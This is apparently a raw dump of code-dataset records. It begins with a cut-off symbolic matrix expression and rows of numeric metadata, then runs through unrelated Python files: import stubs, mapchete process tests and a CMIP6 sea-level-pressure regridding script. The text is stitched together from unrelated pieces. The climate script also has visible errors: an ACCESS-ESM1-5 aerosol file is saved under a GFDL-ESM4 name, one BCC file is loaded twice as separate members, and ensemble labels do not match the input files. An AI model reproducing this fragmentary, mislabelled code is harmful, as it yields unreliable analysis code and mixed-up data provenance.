0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi)*(-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1), 0, 0, 0, 0, 0, 0, 0, 0, 0]])
| 46,477.666667
| 139,406
| 0.408777
| 39,521
| 139,433
| 1.442195
| 0.003821
| 0.228609
| 0.096005
| 0.115164
| 0.991491
| 0.991228
| 0.991228
| 0.99028
| 0.989964
| 0.988999
| 0
| 0.370182
| 0.176644
| 139,433
| 3
| 139,406
| 46,477.666667
| 0.126295
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 17
|
bab0bb415c4dd63d7ef6409cd0071df8f0185a0a
| 138
|
py
|
Python
|
rfhub2/db/base.py
|
Wolfe1/rfhub2
|
7bc5bd95a5b80f0dec62211bc1771d11d604e01b
|
[
"Apache-2.0"
] | null | null | null |
rfhub2/db/base.py
|
Wolfe1/rfhub2
|
7bc5bd95a5b80f0dec62211bc1771d11d604e01b
|
[
"Apache-2.0"
] | null | null | null |
rfhub2/db/base.py
|
Wolfe1/rfhub2
|
7bc5bd95a5b80f0dec62211bc1771d11d604e01b
|
[
"Apache-2.0"
] | null | null | null |
from rfhub2.db.model.base_class import Base
from rfhub2.db.model.keyword import Keyword
from rfhub2.db.model.collection import Collection
| 34.5
| 49
| 0.847826
| 22
| 138
| 5.272727
| 0.409091
| 0.258621
| 0.310345
| 0.439655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02381
| 0.086957
| 138
| 3
| 50
| 46
| 0.896825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
bae81435bf6fa78f67a2883269a6dc6e792840f6
| 108
|
py
|
Python
|
mudi/ref/__init__.py
|
getzlab/mudi
|
eda170119708e59920c23a03834af915ecca24ce
|
[
"MIT"
] | 1
|
2021-11-04T00:08:00.000Z
|
2021-11-04T00:08:00.000Z
|
mudi/ref/__init__.py
|
getzlab/mudi
|
eda170119708e59920c23a03834af915ecca24ce
|
[
"MIT"
] | null | null | null |
mudi/ref/__init__.py
|
getzlab/mudi
|
eda170119708e59920c23a03834af915ecca24ce
|
[
"MIT"
] | null | null | null |
from .markers.immune_markers import IMMUNE_MARKERS
from .markers.immune_markers import IMMUNE_BROAD_MARKERS
| 36
| 56
| 0.888889
| 15
| 108
| 6.066667
| 0.333333
| 0.428571
| 0.373626
| 0.527473
| 0.791209
| 0.791209
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 108
| 2
| 57
| 54
| 0.91
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
2433889e73ffbecdb96177af6511d3cc22ee8904
| 8,730
|
py
|
Python
|
test/test_processes.py
|
Scartography/mapchete
|
f7d1a74acb4021adfd3053501416d2b974c40af9
|
[
"MIT"
] | 161
|
2016-02-20T15:18:13.000Z
|
2022-03-28T11:55:32.000Z
|
test/test_processes.py
|
Scartography/mapchete
|
f7d1a74acb4021adfd3053501416d2b974c40af9
|
[
"MIT"
] | 387
|
2015-08-12T07:16:56.000Z
|
2022-03-30T14:27:12.000Z
|
test/test_processes.py
|
Scartography/mapchete
|
f7d1a74acb4021adfd3053501416d2b974c40af9
|
[
"MIT"
] | 20
|
2016-02-22T12:51:54.000Z
|
2022-01-30T22:54:08.000Z
|
"""Test Mapchete commons module."""
import numpy as np
import numpy.ma as ma
import mapchete
from mapchete.processes.examples import example_process
from mapchete.processes import contours, convert, hillshade
def test_example_process(cleantopo_tl):
with mapchete.open(cleantopo_tl.path) as mp:
zoom = max(mp.config.zoom_levels)
# tile containing data
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
output = example_process.execute(user_process)
assert isinstance(output, ma.masked_array)
# empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
output = example_process.execute(user_process)
assert output == "empty"
def test_convert_raster(cleantopo_tl, cleantopo_tl_tif, landpoly):
with mapchete.open(dict(cleantopo_tl.dict, input=dict(inp=cleantopo_tl_tif))) as mp:
zoom = max(mp.config.zoom_levels)
# execute without clip
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert isinstance(convert.execute(user_process), np.ndarray)
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert convert.execute(user_process) == "empty"
with mapchete.open(
dict(cleantopo_tl.dict, input=dict(inp=cleantopo_tl_tif, clip=landpoly))
) as mp:
zoom = max(mp.config.zoom_levels)
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
# tile with data
default = convert.execute(user_process)
assert isinstance(default, np.ndarray)
# scale_offset
offset = convert.execute(user_process, scale_offset=2)
assert isinstance(offset, np.ndarray)
# scale_ratio
ratio = convert.execute(user_process, scale_ratio=0.5)
assert isinstance(ratio, np.ndarray)
# clip_to_output_dtype
clip_dtype = convert.execute(
user_process, scale_ratio=2, clip_to_output_dtype="uint8"
)
assert isinstance(clip_dtype, np.ndarray)
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert convert.execute(user_process) == "empty"
def test_convert_vector(cleantopo_tl, landpoly):
with mapchete.open(dict(cleantopo_tl.dict, input=dict(inp=landpoly))) as mp:
zoom = max(mp.config.zoom_levels)
# execute without clip
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert isinstance(convert.execute(user_process), list)
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert convert.execute(user_process) == "empty"
def test_contours(cleantopo_tl, cleantopo_tl_tif, landpoly):
with mapchete.open(dict(cleantopo_tl.dict, input=dict(dem=cleantopo_tl_tif))) as mp:
zoom = max(mp.config.zoom_levels)
# execute without clip
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
output = contours.execute(user_process)
assert isinstance(output, list)
assert output
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert contours.execute(user_process) == "empty"
with mapchete.open(
dict(cleantopo_tl.dict, input=dict(dem=cleantopo_tl_tif, clip=landpoly))
) as mp:
zoom = max(mp.config.zoom_levels)
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
output = contours.execute(user_process)
assert isinstance(output, list)
assert output
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert contours.execute(user_process) == "empty"
def test_hillshade(cleantopo_tl, cleantopo_tl_tif, landpoly):
with mapchete.open(dict(cleantopo_tl.dict, input=dict(dem=cleantopo_tl_tif))) as mp:
zoom = max(mp.config.zoom_levels)
# execute without clip
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert isinstance(hillshade.execute(user_process), np.ndarray)
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert hillshade.execute(user_process) == "empty"
with mapchete.open(
dict(cleantopo_tl.dict, input=dict(dem=cleantopo_tl_tif, clip=landpoly))
) as mp:
zoom = max(mp.config.zoom_levels)
tile = next(mp.get_process_tiles(zoom))
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert isinstance(hillshade.execute(user_process), np.ndarray)
# execute on empty tile
tile = mp.config.process_pyramid.tile(
zoom,
mp.config.process_pyramid.matrix_height(zoom) - 1,
mp.config.process_pyramid.matrix_width(zoom) - 1,
)
user_process = mapchete.MapcheteProcess(
tile=tile,
params=mp.config.params_at_zoom(tile.zoom),
input=mp.config.get_inputs_for_tile(tile),
)
assert hillshade.execute(user_process) == "empty"
| 38.628319
| 88
| 0.632532
| 1,056
| 8,730
| 5.006629
| 0.071023
| 0.096841
| 0.068092
| 0.099868
| 0.895026
| 0.88292
| 0.86533
| 0.86533
| 0.86533
| 0.857575
| 0
| 0.003293
| 0.269416
| 8,730
| 225
| 89
| 38.8
| 0.825651
| 0.041352
| 0
| 0.727749
| 0
| 0
| 0.005391
| 0
| 0
| 0
| 0
| 0
| 0.109948
| 1
| 0.026178
| false
| 0
| 0.026178
| 0
| 0.052356
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
031dec79a79cdfa78e07c35b5092d442704ffacd
| 163
|
py
|
Python
|
policy_engine/__init__.py
|
KostasPelelis/DiplomaThesis
|
5ec2b33f32fa604c69c7d88b3f97c5d2112bb7eb
|
[
"MIT"
] | null | null | null |
policy_engine/__init__.py
|
KostasPelelis/DiplomaThesis
|
5ec2b33f32fa604c69c7d88b3f97c5d2112bb7eb
|
[
"MIT"
] | null | null | null |
policy_engine/__init__.py
|
KostasPelelis/DiplomaThesis
|
5ec2b33f32fa604c69c7d88b3f97c5d2112bb7eb
|
[
"MIT"
] | null | null | null |
__version__ = '0.0.1'
from policy_engine.policy_engine import PolicyEngine
from policy_engine.policy import Policy
from logger import init_logging
init_logging()
| 23.285714
| 52
| 0.840491
| 24
| 163
| 5.333333
| 0.458333
| 0.28125
| 0.25
| 0.34375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020548
| 0.104294
| 163
| 7
| 53
| 23.285714
| 0.856164
| 0
| 0
| 0
| 0
| 0
| 0.030488
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0686ed284a528477bb678e37b50ff259f541af52
| 206
|
py
|
Python
|
copycat/data_pipelines/assemblers/__init__.py
|
stungkit/Copycat-abstractive-opinion-summarizer
|
04fe5393a7bb6883516766b762f6a0c530e95375
|
[
"MIT"
] | 51
|
2020-09-25T07:05:01.000Z
|
2022-03-17T12:07:40.000Z
|
copycat/data_pipelines/assemblers/__init__.py
|
stungkit/Copycat-abstractive-opinion-summarizer
|
04fe5393a7bb6883516766b762f6a0c530e95375
|
[
"MIT"
] | 4
|
2020-10-19T10:00:22.000Z
|
2022-03-14T17:02:47.000Z
|
copycat/data_pipelines/assemblers/__init__.py
|
stungkit/Copycat-abstractive-opinion-summarizer
|
04fe5393a7bb6883516766b762f6a0c530e95375
|
[
"MIT"
] | 22
|
2020-09-22T01:06:47.000Z
|
2022-01-26T14:20:09.000Z
|
from .train_pipeline import assemble_train_pipeline
from .eval_pipeline import assemble_eval_pipeline
from .infer_pipeline import assemble_infer_pipeline
from .vocab_pipeline import assemble_vocab_pipeline
| 41.2
| 51
| 0.902913
| 28
| 206
| 6.214286
| 0.285714
| 0.321839
| 0.505747
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07767
| 206
| 4
| 52
| 51.5
| 0.915789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
068ca0072816a116c009c72316160a7b08a9b575
| 33,054
|
py
|
Python
|
psl_extraction.py
|
ubbu36/CMIP6_pacific_analysis
|
b348142f76d3d5e76bd3908235495adf564d6756
|
[
"MIT"
] | 4
|
2021-08-02T02:21:52.000Z
|
2022-01-29T04:00:40.000Z
|
psl_extraction.py
|
ubbu36/CMIP6_pacific_analysis
|
b348142f76d3d5e76bd3908235495adf564d6756
|
[
"MIT"
] | null | null | null |
psl_extraction.py
|
ubbu36/CMIP6_pacific_analysis
|
b348142f76d3d5e76bd3908235495adf564d6756
|
[
"MIT"
] | 1
|
2021-08-02T02:21:40.000Z
|
2021-08-02T02:21:40.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 29 12:33:20 2020
@author: ullaheede
"""
# module import
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
import numpy as np
import xarray as xr
import xesmf as xe
import pandas as pd
def regrid_anomaly(forcing,a):
#control
# uas_control= control['uas']
# uas_control= control['U']
#4xCO2
uas_4xCO2=forcing['psl']
# uas_4xCO2=forcing['U']
# control_timemean=uas_control.mean("time")
uas_4xCO2_anom=uas_4xCO2#-control_timemean
#uas_4xCO2_anom_an=uas_4xCO2_anom
uas_4xCO2_anom_an=uas_4xCO2_anom.groupby('time.year').mean('time')
ds_out = xr.Dataset({'lat': (['lat'], np.arange(-90, 90, 1.0)),
'lon': (['lon'], np.arange(0, 359, 1)),
}
)
regridder = xe.Regridder(uas_4xCO2_anom_an, ds_out, 'bilinear')
uas_regrid = regridder(uas_4xCO2_anom_an)
return uas_regrid
#%%
# forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_ACCESS-ESM1-5_historical_r1i1p1f1_gn_185001-201412.nc')
# a=int(forcing.sizes['time']/12)
# output=regrid_anomaly(forcing,a)
# mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_ACCESS-ESM1-5_historical_r2i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_ACCESS-ESM1-5_historical_r10i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
# forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/WIND_historical/uas_Amon_ACCESS-ESM1-5_historical_r10i1p1f1_gn_185001-201412.nc')
# a=int(forcing.sizes['time']/12)
# output=regrid_anomaly(forcing,a)
# mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_ACCESS-ESM1-5.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_ACCESS-ESM1-5_hist-GHG_r1i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_ACCESS-ESM1-5_hist-GHG_r2i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
# forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/WIND_historical/uas_Amon_ACCESS-ESM1-5_historical_r10i1p1f1_gn_185001-201412.nc')
# a=int(forcing.sizes['time']/12)
# output=regrid_anomaly(forcing,a)
# mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_ACCESS-ESM1-5.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_ACCESS-ESM1-5_hist-aer_r3i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
mylist=xr.concat([output], 'ens_member')
ens_number=['r1']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_GFDL-ESM4.nc')
#%%
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_historical_r1i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_historical_r2i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_historical_r3i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_BCC-CSM2-MR.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_hist-GHG_r1i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_hist-GHG_r2i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_hist-GHG_r3i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_BCC-CSM2-MR.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_hist-aer_r1i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_hist-aer_r2i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_BCC-CSM2-MR_hist-aer_r2i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_BCC-CSM2-MR.nc')
#%%
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_historical_r7i1p2f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_historical_r8i1p2f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_historical_r10i1p2f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_CanESM5.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_hist-GHG_r3i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_hist-GHG_r5i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_hist-GHG_r6i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_CanESM5.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_hist-aer_r3i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_hist-aer_r4i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CanESM5_hist-aer_r10i1p1f1_gn_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_CanESM5.nc')
#%%
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_historical_r1i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_historical_r2i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_historical_r3i1p1f1_gn_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_CESM2.nc')
#######################
